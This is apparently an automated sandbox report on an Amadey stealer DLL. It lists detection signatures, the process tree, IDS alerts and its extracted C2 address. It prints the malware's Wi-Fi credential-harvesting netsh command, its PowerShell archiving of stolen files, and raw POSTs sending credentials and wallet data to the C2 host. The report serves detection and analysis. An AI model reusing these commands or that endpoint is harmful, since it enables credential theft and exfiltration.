Windows Analysis Report
0j6nSbUQQS.dll

Overview

General Information

Sample name: 0j6nSbUQQS.dll (renamed because original name is a hash value)
Original sample name: 921b0badeaffee860310e6755769337e.dll
Analysis ID: 1543325
MD5: 921b0badeaffee860310e6755769337e
SHA1: cfe2dfe5f457383e1723e4423e78620cc9fa8f91
SHA256: c9914b4ab252e782b73ab0a3efad386444ba8a8059167adcb0675968da2df36f
Tags: 32, Amadey, dll, exe

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Uses netsh to modify the Windows network and firewall settings
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6924 cmdline: loaddll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 6952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7072 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7108 cmdline: rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • netsh.exe (PID: 6276 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
          • conhost.exe (PID: 3568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1184 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 5416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 7116 cmdline: rundll32.exe C:\Users\user\Desktop\0j6nSbUQQS.dll,Main MD5: 889B99C52A60DD49227C5E485A016679)
      • netsh.exe (PID: 5020 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • conhost.exe (PID: 3736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2308 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 6880 cmdline: rundll32.exe C:\Users\user\Desktop\0j6nSbUQQS.dll,Save MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7220 cmdline: rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",Main MD5: 889B99C52A60DD49227C5E485A016679)
      • netsh.exe (PID: 7252 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7348 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 7228 cmdline: rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",Save MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Amadey | Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": "185.215.113.217/CoreOPT/index.php", "Version": "5.03"}
Source | Rule | Description | Author | Strings
0j6nSbUQQS.dll | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

    System Summary

    Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7108, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 1184, ProcessName: powershell.exe
    Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7108, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 1184, ProcessName: powershell.exe
    Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7108, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 1184, ProcessName: powershell.exe

    Stealing of Sensitive Information

    Source: Process started | Author: Joe Security: Data: Command: netsh wlan show profiles, CommandLine: netsh wlan show profiles, CommandLine|base64offset|contains: l, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7108, ParentProcessName: rundll32.exe, ProcessCommandLine: netsh wlan show profiles, ProcessId: 6276, ProcessName: netsh.exe
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2024-10-27T17:47:06.264568+0100 | 2855239 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 185.215.113.217 | 80 | TCP
    2024-10-27T17:47:06.286598+0100 | 2855239 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 185.215.113.217 | 80 | TCP
    2024-10-27T17:47:12.415664+0100 | 2855239 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 185.215.113.217 | 80 | TCP

    AV Detection

    Source: 0j6nSbUQQS.dll | Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.217/CoreOPT/index.php", "Version": "5.03"}
    Source: 0j6nSbUQQS.dll | ReversingLabs: Detection: 55%
    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 81.7% probability
    Source: 0j6nSbUQQS.dll | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
    Source: 0j6nSbUQQS.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\OneDrive\desktop.ini
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\Videos\desktop.ini
    Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\Music\desktop.ini

    Networking

    Source: Network traffic | Suricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.4:49731 -> 185.215.113.217:80
    Source: Network traffic | Suricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.4:49732 -> 185.215.113.217:80
    Source: Network traffic | Suricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.4:49730 -> 185.215.113.217:80
    Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 185.215.113.217 80
    Source: Malware configuration extractor | IPs: 185.215.113.217
    Source: global traffic | HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.217 | Content-Length: 21 | Cache-Control: no-cache | Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d | Data Ascii: id=246122658369&cred=
    Source: global traffic | HTTP traffic detected: POST /CoreOPT/index.php?wal=1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=----MzA4MQ== | Host: 185.215.113.217 | Content-Length: 3241 | Cache-Control: no-cache
    Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
    Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.217
    Source: unknown | HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.217 | Content-Length: 21 | Cache-Control: no-cache | Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d | Data Ascii: id=246122658369&cred=
    Source: classification engine | Classification label: mal100.phis.troj.spyw.evad.winDLL@32/18@0/1
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5416:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3736:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6952:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3568:120:WilError_03
    Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\_Files_\NWTVCDUMOB.docx
    Source: 0j6nSbUQQS.dll | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Users\desktop.ini
    Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0j6nSbUQQS.dll,Main
    Source: rundll32.exe, 00000003.00000002.1924040267.0000000002C5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1933821234.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.2006335358.0000000002A7A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll"
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",#1
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0j6nSbUQQS.dll,Main
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",#1
    Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0j6nSbUQQS.dll,Save
    Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",Main
    Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",Save
    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office
    Source: 0j6nSbUQQS.dllStatic file information: File size 1073664 > 1048576
    Source: 0j6nSbUQQS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: 0j6nSbUQQS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: 0j6nSbUQQS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: 0j6nSbUQQS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: 0j6nSbUQQS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: 0j6nSbUQQS.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: 0j6nSbUQQS.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: e.pdb source: powershell.exe, 00000012.00000002.1993610573.000002377BB2B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: embly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000009.00000002.1903288280.00000196A60C4000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: softy.pdbatt source: powershell.exe, 00000009.00000002.1890847060.00000196A5E87000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000012.00000002.1995221099.000002377BB7E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.1903698906.00000196A60FB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1900494001.00000196A6056000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: 000114})peration: (:) [New-Object], MethodInvocationException.pdb source: powershell.exe, 00000009.00000002.1790967706.000001968EF02000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb1(0&0 source: powershell.exe, 00000009.00000002.1900494001.00000196A6056000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbgeName source: powershell.exe, 00000009.00000002.1901080477.00000196A6090000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1899993710.00000196A6050000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1890847060.00000196A5E87000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ion.pdb source: powershell.exe, 00000012.00000002.1993610573.000002377BB0A000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: 6?t.Automation.pdb source: powershell.exe, 00000009.00000002.1901080477.00000196A6090000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbat source: powershell.exe, 00000009.00000002.1890847060.00000196A5E87000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32z source: powershell.exe, 00000012.00000002.1993610573.000002377BB2B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdbment.Automation.pdb source: powershell.exe, 00000012.00000002.1993610573.000002377BB2B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: b.pdb source: powershell.exe, 00000009.00000002.1901080477.00000196A6090000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb5 source: powershell.exe, 00000009.00000002.1900494001.00000196A6056000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ion.pdb% source: powershell.exe, 00000012.00000002.1993610573.000002377BB0A000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: re.pdb source: powershell.exe, 00000012.00000002.1979319690.0000023779949000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: CallSite.Target.pdbShell\vg' source: powershell.exe, 00000012.00000002.1995221099.000002377BB7E000.00000004.00000020.00020000.00000000.sdmp
    Source: 0j6nSbUQQS.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: 0j6nSbUQQS.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: 0j6nSbUQQS.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: 0j6nSbUQQS.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: 0j6nSbUQQS.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B7E00AD pushad ; iretd 9_2_00007FFD9B7E00C1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B8BC2E4 pushfd ; retn 0000h9_2_00007FFD9B8BC2E5
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B8BC2AD pushfd ; retn 0000h9_2_00007FFD9B8BC2E1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B8BB9DE push ss; ret 9_2_00007FFD9B8BB9DF

    Hooking and other Techniques for Hiding and Protection

    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
